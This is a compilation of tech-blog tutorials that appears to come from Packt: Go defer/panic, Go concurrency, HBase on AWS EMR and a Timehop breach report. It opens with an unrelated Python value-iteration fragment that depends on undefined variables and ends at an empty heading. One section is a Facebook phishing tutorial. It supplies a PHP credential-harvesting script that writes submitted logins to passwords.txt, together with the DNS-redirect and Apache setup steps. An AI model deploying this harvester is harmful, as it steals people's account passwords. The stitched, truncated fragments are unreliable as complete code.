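TERMINAL_UTILITY = {GOAL: 1.0, BAD: -1.0}

ACTIONS = {'UP': (0, 1), 'DOWN': (0, -1), 'RIGHT': (1, 0), 'LEFT': (-1, 0)}
PERPENDICULAR = {'UP': ('LEFT', 'RIGHT'), 'DOWN': ('LEFT', 'RIGHT'),
                 'LEFT': ('UP', 'DOWN'), 'RIGHT': ('UP', 'DOWN')}

def move(state, action):
    # Bounce back if the move hits the wall or leaves the grid.
    dc, dr = ACTIONS[action]
    nxt = (state[0] + dc, state[1] + dr)
    return state if nxt not in STATES else nxt

def transitions(state, action):
    # 0.8 in the intended direction, 0.1 for each perpendicular direction.
    yield 0.8, move(state, action)
    for side in PERPENDICULAR[action]:
        yield 0.1, move(state, side)

def value_iteration(num_iterations):
    utility = {s: TERMINAL_UTILITY.get(s, 0.0) for s in STATES}
    for _ in range(num_iterations):
        new_utility = dict(utility)
        for s in STATES:
            if s in TERMINAL_UTILITY:
                continue
            best = max(sum(p * utility[s2] for p, s2 in transitions(s, a))
                       for a in ACTIONS)
            new_utility[s] = STEP_REWARD + GAMMA * best
        utility = new_utility
    return utility

X = (3, 3)
print('U_1(X) =', round(value_iteration(1)[X], 3))   # 0.36
print('U_2(X) =', round(value_iteration(2)[X], 3))   # 0.376

Running this sketch reproduces the hand-computed values U_1(X) = 0.36 and U_2(X) = 0.376, and raising num_iterations lets you watch the utilities converge to their true values.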
Understanding Go Internals: defer, panic() and recover() functions [Tutorial]

Packt Editorial Staff
09 Jul 2018
8 min read
The Go programming language, often referred to as Golang, is making strides with masterclass developments and architecture by the greatest programming minds.  The Go features are extremely handy, and you can use them all the time. However, there is nothing more rewarding than being able to see and understand what is going on in the background and how Go operates behind the scenes. In this article we will learn to use the defer keyword, panic() and recover() functions in Go. This article is extracted from the First Edition of Mastering Go written by Mihalis Tsoukalos. The concepts discussed in this article (and more) have been updated or improved in the third edition of Mastering Go. The defer keyword The defer keyword postpones the execution of a function until the surrounding function returns. It is widely used in file input and output operations because it saves you from having to remember when to close an opened file: the defer keyword allows you to put the function call that closes an opened file near to the function call that opened it. You will also see defer in action in the section that talks about the panic()  and recover() built-in Go functions. It is very important to remember that deferred functions are executed in Last In First Out (LIFO) order after the return of the surrounding function. Put simply, this means that if you defer function f1() first, function f2() second, and function f3() third in the same surrounding function, when the surrounding function is about to return, function f3() will be executed first, function f2() will be executed second, and function f1() will be the last one to get executed. As this definition of defer is a little unclear, I think that you will understand the use of defer a little better by looking at the Go code and the output of the defer.go  program, which will be presented in three parts. The first part of the program follows: package main import (  "fmt" ) func d1() { for i := 3; i > 0; i-- { defer fmt.Print(i, " ") } } Apart from the import block, the preceding Go code implements a function named d1() with a for loop and a defer statement that will be executed three times. The second part of defer.go   contains the following Go code: func d2() { for i := 3; i > 0; i-- { defer func() { fmt.Print(i, " ") }() } fmt.Println() } In this part of the code, you can see the implementation of another function that is named d2(). The d2() function also contains a for loop and a defer statement that will be also executed three times. However, this time the defer keyword is applied to an anonymous function instead of a single fmt.Print() statement. Additionally, the anonymous function takes no parameters. The last part of the Go code follows: func d3() { for i := 3; i > 0; i-- { defer func(n int) { fmt.Print(n, " ") }(i) } } func main() { d1() d2() fmt.Println() d3() fmt.Println() } Apart from the main() function that calls the d1(), d2(), and d3() functions, you can also see the implementation of the d3() function, which has a for loop that uses the defer keyword on an anonymous function. However, this time the anonymous function requires one integer parameter named n. The Go code tells us that the n parameter takes its value from the i variable used in the for loop. Executing defer.go will create the following output: $ go run defer.go 1 2 3 0 0 0 1 2 3 You will most likely find the generated output complicated and challenging to understand. 
This underscores the fact that the operation and the results of the use of defer can be tricky if your code is not clear and unambiguous. Let's examine the results in order to get a better idea of how tricky defer can be if you do not pay close attention to your code. We will start with the first line of the output (1 2 3), which is generated by the d1() function. The values of i in d1() are 3, 2, and 1 in that order. The function that is deferred in d1() is the fmt.Print() statement. As a result, when the d1() function is about to return, you get the three values of the i variable of the for loop in reverse order because deferred functions are executed in LIFO order. Now, let us inspect the second line of the output that is produced by the d2() function. It is really strange that we got three zeros instead of 1 2 3 in the output. The reason for this, however, is relatively simple. After the for loop has ended, the value of i is 0, because it is that value of i that made the for loop terminate. However, the tricky part here is that the deferred anonymous function is evaluated after the for loop ends, because it has no parameters. This means that is evaluated three times for an i value of 0, hence the generated output! This kind of confusing code is what might lead to the creation of nasty bugs in your projects, so try to avoid it! Last, we will talk about the third line of the output, which is generated by the d3() function. Due to the parameter of the anonymous function, each time the anonymous function is deferred, it gets and uses the current value of i. As a result, each execution of the anonymous function has a different value to process, thus the generated output. After this, it should be clear that the best approach to the use of defer is the third one, which is exhibited in the d3() function. This is so because you intentionally pass the desired variable in the anonymous function in an easy to understand way. Panic and Recover This technique involves the use of the panic() and recover() functions, and it will be presented in panicRecover.go, which you will review in three parts. Strictly speaking, panic() is a built-in Go function that terminates the current flow of a Go program and starts panicking! On the other hand, the recover() function, which is also a built-in Go function, allows you to take back the control of a goroutine that just panicked using panic(). The first part of the program follows: package main import ( "fmt" ) func a() { fmt.Println("Inside a()") defer func() { if c := recover(); c != nil { fmt.Println("Recover inside a()!") } }() fmt.Println("About to call b()") b() fmt.Println("b() exited!") fmt.Println("Exiting a()") } Apart from the import block, this part includes the implementation of the a() function. The most important part of the a() function is the defer block of code, which implements an anonymous function that will be called when there is a call to panic(). The second code segment of panicRecover.go follows next: func b() { fmt.Println("Inside b()") panic("Panic in b()!") fmt.Println("Exiting b()") } The last part of the program, which illustrates the panic() and recover() functions, is as follows: func main() { a() fmt.Println("main() ended!") } Executing panicRecover.go will create the following output: $ go run panicRecover.go Inside a() About to call b() Inside b() Recover inside a()! main() ended! What just happened here is really impressive! 
However, as you can see from the output, the a() function did not end normally, because its last two statements did not get executed: fmt.Println("b() exited!") fmt.Println("Exiting a()") Nevertheless, the good thing is that panicRecover.go ended according to our will without panicking because the anonymous function used in defer took control of the situation! Also note that function b() knows nothing about function a(). However, function a() contains Go code that handles the panic condition of function b()! Using the panic function on its own You can also use the panic() function on its own without any attempt to recover, and this subsection will show you its results using the Go code of justPanic.go, which will be presented in two parts. The first part of justPanic.go follows next: package main import ( "fmt" "os" ) As you can see, the use of panic() does not require any extra Go packages. The second part of justPanic.go is shown in the following Go code: func main() { if len(os.Args) == 1 { panic("Not enough arguments!") } fmt.Println("Thanks for the argument(s)!") } If your Go program does not have at least one command line argument, it will call the panic() function. The panic() function takes one parameter, which is the error message that you want to print on the screen. Executing justPanic.go on a macOS High Sierra machine will create the following output: $ go run justPanic.go panic: Not enough arguments! goroutine 1 [running]: main.main() /Users/mtsouk/ch2/code/justPanic.go:10 +0x9e exit status 2 Thus, using the panic() function on its own will terminate the Go program without giving you the opportunity to recover! Therefore use of the panic() and recover() pair is much more practical and professional than just using panic() alone. To summarize, we covered some of the interesting Go topics like; defer keyword; the panic() and recover() functions. To explore other major features and packages in Go, get our latest edition in Go programming, Mastering Go, written by Mihalis Tsoukalos. Implementing memory management with Golang’s garbage collector Why is Go the go-to language for cloud native development? – An interview with Mina Andrawos How to build a basic server side chatbot using Go How Concurrency and Parallelism works in Golang [Tutorial]  
Timehop suffers data breach; 21 million users' data compromised

Richard Gall
09 Jul 2018
3 min read
Timehop, the social media application that brings old posts into your feed, experienced a data breach on July 4. In a post published yesterday (July 8) the team explained that 'an access credential to our cloud computing enterprise was compromised'. Timehop believes 21 million users have been affected by the breach. However, it was keen to state that "we have no evidence that any accounts were accessed without authorization." Timehop has already acted to make necessary changes. Certain application features have been temporarily disabled, and users have been logged out of the app. Users will also have to re-authenticate Timehop on social media accounts. The team has deactivated the keys that allow the app to read and show users social media posts on their feeds. Timehop explained that the gap between the incident and the public statement was due to the need to "contact with a large number of partners." The investigation needed to be thorough in order for the response to be clear and coordinated. How did the Timehop data breach happen? For transparency, Timehop published a detailed technical report on how it believes the hack happened. An unauthorized user first accessed Timehop's cloud computing environment using an authorized users credentials. This user then conducted 'reconnaisance activities' once they had created a new administrative account. This user logged in to the account on numerous occasions after this in March and June 2018. It was only on July 4 that the attacker then attempted to access the production database. Timehop then states that they "conducted a specific action that triggered an alarm" which allowed engineers to act quickly to stop the attack from continuing. Once this was done, there was a detailed and thorough investigation. This included analyzing the attacker's activity on the network and auditing all security permissions and processes. A measured response to a potential crisis It's worth noting just how methodical Timehop's response has been. Yes, there will be question marks over the delay, but it does make a lot of sense. Timehop revealed that the news was provided to some journalists "under embargo in order to determine the most effective ways to communicate what had happened while neither causing panic nor resorting to bland euphemism." The incident demonstrates that effective cybersecurity is as much about a robust communication strategy as it is about secure software.  Read next: Did Facebook just have another security scare? What security and systems specialists are planning to learn in 2018
Phish for Facebook passwords with DNS manipulation [Tutorial]

Savia Lobo
09 Jul 2018
6 min read
Password Phishing can result in huge loss of identity and user's confidential details. This could result in financial losses for users and can also prevent them from accessing their own accounts. In this article,  we will see how an attacker can take advantage of manipulating the DNS record for Facebook, redirect traffic to the phishing page, and grab the account password. This article is an excerpt taken from 'Python For Offensive PenTest' written by Hussam Khrais.  Facebook password phishing Here, we will see how an attacker can take advantage of manipulating the DNS record for Facebook, redirect traffic to the phishing page, and grab the account password. First, we need to set up a phishing page. You need not be an expert in web programming. You can easily Google the steps for preparing a phishing account. To create a phishing page, first open your browser and navigate to the Facebook login page. Then, on the browser menu, click on File and then on Save page as.... Then, make sure that you choose a complete page from the drop-down menu. The output should be an .html file. Now let's extract some data here. Open the Phishing folder from the code files provided with this book. Rename the Facebook HTML page index.html. Inside this HTML, we have to change the login form. If you search for action=, you will see it. Here, we change the login form to redirect the request into a custom PHP page called login.php. Also, we have to change the request method to GET instead of POST. You will see that I have added a login.php page in the same Phishing directory. If you open the file, you will find the following script: <?php header("Location: http://www.facebook.com/home.php? "); $handle = fopen("passwords.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "rn"); } fwrite($handle, "rn"); fclose($handle); exit; ?> As soon as our target clicks on the Log In button, we will send the data as a GET request to this login.php and we will store the submitted data in our passwords.txt file; then, we will close it. Next, we will create the passwords.txt file, where the target credentials will be stored. Now, we will copy all of these files into varwww and start the Apache services. If we open the index.html page locally, we will see that this is the phishing page that the target will see. Let's recap really quickly what will happen when the target clicks on the Log In button? As soon as our target clicks on the Log In button, the target's credentials will be sent as GET requests to login.php. Remember that this will happen because we have modified the action parameter to send the credentials to login.php. After that, the login.php will eventually store the data into the passwords.txt file. Now, before we start the Apache services, let me make sure that we get an IP address. Enter the following command: ifconfig eth0 You can see that we are running on 10.10.10.100 and we will also start the Apache service using: service apache2 start Let's verify that we are listening on port 80, and the service that is listening is Apache: netstat -antp | grep "80" Now, let's jump to the target side for a second. In our previous section, we have used google.jo in our script. Here, we have already modified our previous script to redirect the Facebook traffic to our attacker machine. So, all our target has to do is double-click on the EXE file. Now, to verify: Let us start Wireshark and then start the capture. 
We will filter on the attacker IP, which is 10.10.10.100: Open the browser and navigate to https://www.facebook.com/: Once we do this, we're taken to the phishing page instead. Here, you will see the destination IP, which is the Kali IP address. So, on the target side, once we are viewing or hitting https://www.facebook.com/, we are basically viewing index.html, which is set up on the Kali machine. Once the victim clicks on the login page, we will send the data as a GET request to login.php, and we will store it into passwords.txt, which is currently empty. Now, log into your Facebook account using your username and password. and jump on the Kali side and see if we get anything on the passwords.txt file. You can see it is still empty. This is because, by default, we have no permission to write data. Now, to fix this, we will give all files full privilege, that is, to read, write, and execute: chmod -R 777 /var/www/ Note that we made this, since we are running in a VirtualBox environment. If you have a web server exposed to the public, it's bad practice to give full permission to all of your files due to privilege escalation attacks, as an attacker may upload a malicious file or manipulate the files and then browse to the file location to execute a command on his own. Now, after giving the permission, we will stop and start the Apache server just in case: service apache2 stop service apache2 start After doing this modification, go to the target machine and try to log into Facebook one more time. Then, go to Kali and click on passwords.txt. You will see the submitted data from the target side, and we can see the username and the password. In the end, a good sign for a phishing activity is missing the https sign. We performed the password phishing process using Python. If you have enjoyed reading this excerpt, do check out 'Python For Offensive PenTest' to learn how to protect yourself and secure your account from these attacks and code your own scripts and master ethical hacking from scratch. Phish for passwords using DNS poisoning [Tutorial] How to secure a private cloud using IAM How cybersecurity can help us secure cyberspace
How Concurrency and Parallelism works in Golang [Tutorial]

Natasha Mathur
06 Jul 2018
11 min read
Computer and software programs are useful because they do a lot of laborious work very fast and can also do multiple things at once. We want our programs to be able to do multiple things simultaneously, and the success of a programming language can depend on how easy it is to write and understand multitasking programs. Concurrency and parallelism are two terms that are bound to come across often when looking into multitasking and are often used interchangeably. However, they mean two distinctly different things. In this article, we will look at how concurrency and parallelism work in Go using simple examples for better understanding. Let's get started! This article is an excerpt from a book 'Distributed Computing with Go' written by V.N. Nikhil Anurag. The standard definitions given on the Go blog are as follows: Concurrency: Concurrency is about dealing with lots of things at once. This means that we manage to get multiple things done at once in a given period of time. However, we will only be doing a single thing at a time. This tends to happen in programs where one task is waiting and the program decides to run another task in the idle time. In the following diagram, this is denoted by running the yellow task in idle periods of the blue task. Parallelism: Parallelism is about doing lots of things at once. This means that even if we have two tasks, they are continuously working without any breaks in between them. In the diagram, this is shown by the fact that the green task is running independently and is not influenced by the red task in any manner: It is important to understand the difference between these two terms. Let's look at a few concrete examples to further elaborate upon the difference between the two. Concurrency Let's look at the concept of concurrency using a simple example of a few daily routine tasks and the way we can perform them. Imagine you start your day and need to get six things done: Make hotel reservation Book flight tickets Order a dress Pay credit card bills Write an email Listen to an audiobook The order in which they are completed doesn't matter, and for some of the tasks, such as  writing an email or listening to an audiobook, you need not complete them in a single sitting. Here is one possible way to complete the tasks: Order a dress. Write one-third of the email. Make hotel reservation. Listen to 10 minutes of audiobook. Pay credit card bills. Write another one-third of the email. Book flight tickets. Listen to another 20 minutes of audiobook. Complete writing the email. Continue listening to audiobook until you fall asleep. In programming terms, we have executed the above tasks concurrently. We had a complete day and we chose particular tasks from our list of tasks and started to work on them. For certain tasks, we even decided to break them up into pieces and work on the pieces between other tasks. We will eventually write a program which does all of the preceding steps concurrently, but let's take it one step at a time. Let's start by building a program that executes the tasks sequentially, and then modify it progressively until it is purely concurrent code and uses goroutines. The progression of the program will be in three steps: Serial task execution. Serial task execution with goroutines. Concurrent task execution. Code overview The code will consist of a set of functions that print out their assigned tasks as completed. In the cases of writing an email or listening to an audiobook, we further divide the tasks into more functions. 
This can be seen as follows: writeMail, continueWritingMail1, continueWritingMail2 listenToAudioBook, continueListeningToAudioBook Serial task execution Let's first implement a program that will execute all the tasks in a linear manner. Based on the code overview we discussed previously, the following code should be straightforward: package main import ( "fmt" ) // Simple individual tasks func makeHotelReservation() { fmt.Println("Done making hotel reservation.") } func bookFlightTickets() { fmt.Println("Done booking flight tickets.") } func orderADress() { fmt.Println("Done ordering a dress.") } func payCreditCardBills() { fmt.Println("Done paying Credit Card bills.") } // Tasks that will be executed in parts // Writing Mail func writeAMail() { fmt.Println("Wrote 1/3rd of the mail.") continueWritingMail1() } func continueWritingMail1() { fmt.Println("Wrote 2/3rds of the mail.") continueWritingMail2() } func continueWritingMail2() { fmt.Println("Done writing the mail.") } // Listening to Audio Book func listenToAudioBook() { fmt.Println("Listened to 10 minutes of audio book.") continueListeningToAudioBook() } func continueListeningToAudioBook() { fmt.Println("Done listening to audio book.") } // All the tasks we want to complete in the day. // Note that we do not include the sub tasks here. var listOfTasks = []func(){ makeHotelReservation, bookFlightTickets, orderADress, payCreditCardBills, writeAMail, listenToAudioBook, } func main() { for _, task := range listOfTasks { task() } } We take each of the main tasks and start executing them in simple sequential order. Executing the preceding code should produce unsurprising output, as shown here: Done making hotel reservation. Done booking flight tickets. Done ordering a dress. Done paying Credit Card bills. Wrote 1/3rd of the mail. Wrote 2/3rds of the mail. Done writing the mail. Listened to 10 minutes of audio book. Done listening to audio book. Serial task execution with goroutines We took a list of tasks and wrote a program to execute them in a linear and sequential manner. However, we want to execute the tasks concurrently! Let's start by first introducing goroutines for the split tasks and see how it goes. We will only show the code snippet where the code actually changed here: /******************************************************************** We start by making Writing Mail & Listening Audio Book concurrent. *********************************************************************/ // Tasks that will be executed in parts // Writing Mail func writeAMail() { fmt.Println("Wrote 1/3rd of the mail.") go continueWritingMail1() // Notice the addition of 'go' keyword. } func continueWritingMail1() { fmt.Println("Wrote 2/3rds of the mail.") go continueWritingMail2() // Notice the addition of 'go' keyword. } func continueWritingMail2() { fmt.Println("Done writing the mail.") } // Listening to Audio Book func listenToAudioBook() { fmt.Println("Listened to 10 minutes of audio book.") go continueListeningToAudioBook() // Notice the addition of 'go' keyword. } func continueListeningToAudioBook() { fmt.Println("Done listening to audio book.") } The following is a possible output: Done making hotel reservation. Done booking flight tickets. Done ordering a dress. Done paying Credit Card bills. Wrote 1/3rd of the mail. Listened to 10 minutes of audio book. Whoops! That's not what we were expecting. 
The output from the continueWritingMail1, continueWritingMail2, and continueListeningToAudioBook functions is missing; the reason being that we are using goroutines. Since goroutines are not waited upon, the code in the main function continues executing and once the control flow reaches the end of the main function, the program ends. What we would really like to do is to wait in the main function until all the goroutines have finished executing. There are two ways we can do this—using channels or using WaitGroup.  We'll use WaitGroup now. In order to use WaitGroup, we have to keep the following in mind: Use WaitGroup.Add(int) to keep count of how many goroutines we will be running as part of our logic. Use WaitGroup.Done() to signal that a goroutine is done with its task. Use WaitGroup.Wait() to wait until all goroutines are done. Pass WaitGroup instance to the goroutines so they can call the Done() method. Based on these points, we should be able to modify the source code to use WaitGroup. The following is the updated code: package main import ( "fmt" "sync" ) // Simple individual tasks func makeHotelReservation(wg *sync.WaitGroup) { fmt.Println("Done making hotel reservation.") wg.Done() } func bookFlightTickets(wg *sync.WaitGroup) { fmt.Println("Done booking flight tickets.") wg.Done() } func orderADress(wg *sync.WaitGroup) { fmt.Println("Done ordering a dress.") wg.Done() } func payCreditCardBills(wg *sync.WaitGroup) { fmt.Println("Done paying Credit Card bills.") wg.Done() } // Tasks that will be executed in parts // Writing Mail func writeAMail(wg *sync.WaitGroup) { fmt.Println("Wrote 1/3rd of the mail.") go continueWritingMail1(wg) } func continueWritingMail1(wg *sync.WaitGroup) { fmt.Println("Wrote 2/3rds of the mail.") go continueWritingMail2(wg) } func continueWritingMail2(wg *sync.WaitGroup) { fmt.Println("Done writing the mail.") wg.Done() } // Listening to Audio Book func listenToAudioBook(wg *sync.WaitGroup) { fmt.Println("Listened to 10 minutes of audio book.") go continueListeningToAudioBook(wg) } func continueListeningToAudioBook(wg *sync.WaitGroup) { fmt.Println("Done listening to audio book.") wg.Done() } // All the tasks we want to complete in the day. // Note that we do not include the sub tasks here. var listOfTasks = []func(*sync.WaitGroup){ makeHotelReservation, bookFlightTickets, orderADress, payCreditCardBills, writeAMail, listenToAudioBook, } func main() { var waitGroup sync.WaitGroup // Set number of effective goroutines we want to wait upon waitGroup.Add(len(listOfTasks)) for _, task := range listOfTasks{ // Pass reference to WaitGroup instance // Each of the tasks should call on WaitGroup.Done() task(&waitGroup) } // Wait until all goroutines have completed execution. waitGroup.Wait() } Here is one possible output order; notice how continueWritingMail1 and continueWritingMail2 were executed at the end after listenToAudioBook and continueListeningToAudioBook: Done making hotel reservation. Done booking flight tickets. Done ordering a dress. Done paying Credit Card bills. Wrote 1/3rd of the mail. Listened to 10 minutes of audio book. Done listening to audio book. Wrote 2/3rds of the mail. Done writing the mail. Concurrent task execution In the final output of the previous part, we can see that all the tasks in listOfTasks are being executed in serial order, and the last step for maximum concurrency would be to let the order be determined by Go runtime instead of the order in listOfTasks. 
This might sound like a laborious task, but in reality this is quite simple to achieve. All we need to do is add the go keyword in front of task(&waitGroup): func main() { var waitGroup sync.WaitGroup // Set number of effective goroutines we want to wait upon waitGroup.Add(len(listOfTasks)) for _, task := range listOfTasks { // Pass reference to WaitGroup instance // Each of the tasks should call on WaitGroup.Done() go task(&waitGroup) // Achieving maximum concurrency } // Wait until all goroutines have completed execution. waitGroup.Wait() Following is a possible output: Listened to 10 minutes of audio book. Done listening to audio book. Done booking flight tickets. Done ordering a dress. Done paying Credit Card bills. Wrote 1/3rd of the mail. Wrote 2/3rds of the mail. Done writing the mail. Done making hotel reservation. If we look at this possible output, the tasks were executed in the following order: Listen to audiobook. Book flight tickets. Order a dress. Pay credit card bills. Write an email. Make hotel reservations. Now that we have a good idea on what concurrency is and how to write concurrent code using goroutines and WaitGroup, let's dive into parallelism. Parallelism Imagine that you have to write a few emails. They are going to be long and laborious, and the best way to keep yourself entertained is to listen to music while writing them, that is, listening to music "in parallel" to writing the emails. If we wanted to write a program that simulates this scenario, the following is one possible implementation: package main import ( "fmt" "sync" "time" ) func printTime(msg string) { fmt.Println(msg, time.Now().Format("15:04:05")) } // Task that will be done over time func writeMail1(wg *sync.WaitGroup) { printTime("Done writing mail #1.") wg.Done() } func writeMail2(wg *sync.WaitGroup) { printTime("Done writing mail #2.") wg.Done() } func writeMail3(wg *sync.WaitGroup) { printTime("Done writing mail #3.") wg.Done() } // Task done in parallel func listenForever() { for { printTime("Listening...") } } func main() { var waitGroup sync.WaitGroup waitGroup.Add(3) go listenForever() // Give some time for listenForever to start time.Sleep(time.Nanosecond * 10) // Let's start writing the mails go writeMail1(&waitGroup) go writeMail2(&waitGroup) go writeMail3(&waitGroup) waitGroup.Wait() } The output of the program might be as follows: Done writing mail #3. 19:32:57 Listening... 19:32:57 Listening... 19:32:57 Done writing mail #1. 19:32:57 Listening... 19:32:57 Listening... 19:32:57 Done writing mail #2. 19:32:57 The numbers represent the time in terms of Hour:Minutes:Seconds and, as can be seen, they are being executed in parallel. You might have noticed that the code for parallelism looks almost identical to the code for the final concurrency example. However, in the function listenForever, we are printing Listening... in an infinite loop. If the preceding example was written without goroutines, the output would keep printing Listening... and never reach the writeMail function calls. Goroutines are concurrent and, to an extent, parallel; however, we should think of them as being concurrent. The order of execution of goroutines is not predictable and we should not rely on them to be executed in any particular order. We should also take care to handle errors and panics in our goroutines because even though they are being executed in parallel, a panic in one goroutine will crash the complete program. 
Finally, goroutines can block on system calls, however, this will not block the execution of the program nor slow down the performance of the overall program. We looked at how goroutine can be used to run concurrent programs and also learned how parallelism works in Go. If you found this post useful, do check out the book 'Distributed Computing with Go' to learn more about Goroutines, channels and messages, and other concepts in Go. Golang Decorators: Logging & Time Profiling Essential Tools for Go Programming Why is Go the go-to language for cloud-native development? – An interview with Mina Andrawos
How to optimize Hbase for the Cloud [Tutorial]

Natasha Mathur
06 Jul 2018
8 min read
Hadoop/Hbase was designed to crunch a huge amount of data in a batch mode and provide meaningful results to this data. This article is an excerpt taken from the book ‘HBase High Performance Cookbook’ written by Ruchir Choudhry. This book provides a solid understanding of the HBase basics. However, as the technology evolved over the years, the original architecture was fine tuned to move from the world of big-iron to the choice of cloud Infrastructure: It provides optimum pricing for the provisioning of new hardware, storage, and monitoring the infrastructure. One-click setup of additional nodes and storage. Elastic load-balancing to different clusters within the Hbase ecosystem. Ability to resize the cluster on-demand. Share capacity with different time-zones, for example, doing batch jobs in different data centers to and real-time analytics near to the customer. Easy integration with other Cloud-based services. HBase on Amazon EMR provides the ability to back up your HBase data directly to Amazon Simple Storage Service (Amazon S3). You can also restore from a previously created backup when launching an HBase cluster. Configuring Hbase for the Cloud Before we start, let's take a quick look at the supported versions and the prerequisites you need to move ahead. The list of supported versions is as below: Hbase Version - 0.94.18 & 0.94 AMI Versions - 3.1.0 and later & 3.0-3.04 AWS CLI configuration parameters -  -ami-version 3.1 -ami-version 3.2 -ami-version 3.3 --applications Name=Hbase --ami-version 3.0 --application name=Hbase --ami-version 2.2 or later --applications Name=HBase Hbase Version details -  Bug fixes Now let's look at the prerequisites: At least two instances (Optional): The cluster's master node runs the HBase master server and Zookeeper, and slave nodes run the HBase region servers. For optimum performance and production systems, HBase clusters should run on at least two EC2 instances, but you can run HBase on a single node for evaluation Purposes. Long-running clusters: HBase only runs on long-running clusters. By default, the CLI and Amazon EMR console create long-running clusters. An Amazon EC2 key pair set (Recommended): To use the Secure Shell (SSH) network protocol to connect with the master node and run HBase shell commands, you must use an Amazon EC2 key pair when you create the cluster. The correct AMI and Hadoop versions: HBase clusters are currently supported only on Hadoop 20.205 or later. The AWS CLI: This is needed to interact with Hbase using the command-line options. Use of Ganglia tool: For monitoring, it's advisable to use the Ganglia tool; this provides all information related to performance and can be installed as a client lib when we create the cluster. The logs for Hbase: They are available on the master node; it's a standard practice in a production environment to copy these logs to the Amazon S3 cluster. How to do it Open a browser and copy the following URL: (https://console.aws.amazon.com/elasticmapreduce/); if you don't have an Amazon AWS account, then you have to create it. Then choose Create cluster as shown in the following: Provide the cluster name; you must select Launch mode as cluster Let's proceed to the software configuration section. There are two options: Amazon template or MapR template. We are going to use Amazon template. It will load the default applications, which includes Hbase. Security is key when you are using ssh to the login to the cluster. 
How to do it
Open a browser and go to https://console.aws.amazon.com/elasticmapreduce/; if you don't have an Amazon AWS account, you will have to create one. Then choose Create cluster.
Provide the cluster name; you must select Launch mode as Cluster.
Proceed to the software configuration section. There are two options, the Amazon template or the MapR template; we are going to use the Amazon template, which loads the default applications, including HBase.
Security is key when you are using SSH to log in to the cluster. Let's create a security key by selecting NETWORK & SECURITY in the left-hand panel; here we have created one called Hbase03. Once you create this key, you will be asked to download a .pem file, in this case hbase03.pem. Copy this file to your user location and change its permissions with chmod 400 hbase03.pem. This restricts the key file to read-only access for your own user, so it is not accessible to anyone else.
Now select this key pair from the EC2 key pair drop-down box; this registers the key with the instance while it is being provisioned. You can do this later too, but I had some challenges doing that, so it is always better to provision the instance with this property set.
Now you are ready to provision the EMR cluster. Go ahead and provision it. It will take around 10 to 20 minutes for the cluster to be fully accessible and in a running condition. Verify it by observing the console.
How it works
When you select the cluster name, it is mapped to your account internally, and the mapping is kept for as long as the cluster is alive (and not destroyed). When you select an installation using these settings, it loads all the respective JAR files, which allows the cluster to operate in a fully distributed environment. You can select the EMR or MapR stable release, which loads compatible libraries and lets us focus on the solution rather than troubleshooting integration issues within the Hadoop/HBase farms. Internally, all the slaves connect to the master, which is why we chose an extra-large VM.
Connecting to an Hbase cluster using the command line
How to do it
You can alternatively SSH to the master node and inspect the details there. Once you have connected to the cluster, you can perform all the tasks you can perform on local clusters; the console lists the components we selected while installing the cluster. Let's connect to the HBase shell to make sure all the components are communicating internally and we are able to create a sample table.
How it works
The communication between your machine and the HBase cluster works by passing a key every time a command is executed; this keeps the communication private. The shell becomes a remote shell that connects to the HBase master over this private connection. All the standard HBase shell commands, such as put, create, scan, and get, are available, just as on a local cluster. (A minimal Java-client version of the same sample-table exercise follows.)
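If you would rather run the sample-table check from code than from the interactive shell, the HBase Java client can do the same thing. The following is a minimal sketch, assuming the HBase 1.x client library is on the classpath and the cluster's hbase-site.xml (or Zookeeper quorum) is visible to the configuration; the table name, column family, and values are placeholders, not part of the original recipe.

import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.hbase.HBaseConfiguration;
import org.apache.hadoop.hbase.HColumnDescriptor;
import org.apache.hadoop.hbase.HTableDescriptor;
import org.apache.hadoop.hbase.TableName;
import org.apache.hadoop.hbase.client.Admin;
import org.apache.hadoop.hbase.client.Connection;
import org.apache.hadoop.hbase.client.ConnectionFactory;
import org.apache.hadoop.hbase.client.Get;
import org.apache.hadoop.hbase.client.Put;
import org.apache.hadoop.hbase.client.Result;
import org.apache.hadoop.hbase.client.Table;
import org.apache.hadoop.hbase.util.Bytes;

public class SampleTableCheck {
    public static void main(String[] args) throws Exception {
        // Picks up hbase-site.xml (Zookeeper quorum and so on) from the classpath.
        Configuration conf = HBaseConfiguration.create();
        try (Connection connection = ConnectionFactory.createConnection(conf);
             Admin admin = connection.getAdmin()) {

            TableName tableName = TableName.valueOf("sample");
            if (!admin.tableExists(tableName)) {
                HTableDescriptor desc = new HTableDescriptor(tableName);
                desc.addFamily(new HColumnDescriptor("cf"));
                admin.createTable(desc);
            }

            try (Table table = connection.getTable(tableName)) {
                // Equivalent of: put 'sample', 'row1', 'cf:greeting', 'hello'
                Put put = new Put(Bytes.toBytes("row1"));
                put.addColumn(Bytes.toBytes("cf"), Bytes.toBytes("greeting"), Bytes.toBytes("hello"));
                table.put(put);

                // Equivalent of: get 'sample', 'row1'
                Result result = table.get(new Get(Bytes.toBytes("row1")));
                System.out.println("Read back: "
                        + Bytes.toString(result.getValue(Bytes.toBytes("cf"), Bytes.toBytes("greeting"))));
            }
        }
    }
}

Running it on the master node is the simplest option, since the client configuration is already in place there.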
Backing up and restoring Hbase
Amazon Elastic MapReduce provides multiple ways to back up and restore HBase data to S3. It also allows incremental backups; during the backup process, HBase continues to execute write commands, so you can keep working while the backup runs. This does carry a risk of inconsistency in the data. If consistency is of prime importance, writes need to be stopped during the initial backup process and synchronized across nodes; this can be achieved by passing the --consistent parameter when requesting a backup. When you back up HBase data, you should specify a different backup directory for each cluster. An easy way to do this is to use the cluster identifier as part of the path specified for the backup directory, for example, s3://mybucket/backups/j-3AEXXXXXX16F2. This ensures that any future incremental backups reference the correct HBase cluster.
How to do it
When you are ready to delete old backup files that are no longer needed, we recommend that you first do a full backup of your HBase data. This ensures that all data is preserved and provides a baseline for future incremental backups. Once the full backup is done, you can navigate to the backup location and manually delete the old backup files.
While creating a cluster, add an additional step to schedule regular backups. You have to specify the backup location where the backup file with the data will be kept, based on the backup frequency selected. For highly valuable data, you can back up on an hourly basis; for less sensitive data, a daily backup can be planned.
It's good practice to back up to a separate location in Amazon S3 to ensure that incremental backups are calculated correctly.
It's important to specify the exact time from which the backup will start; the time zone specified is UTC for our cluster.
We can proceed with creating the cluster as planned; it will back up the data to the location specified.
To restore, you have to provide the exact location of the backup file. The version that was backed up needs to be specified and saved, which allows the data to be restored.
How it works
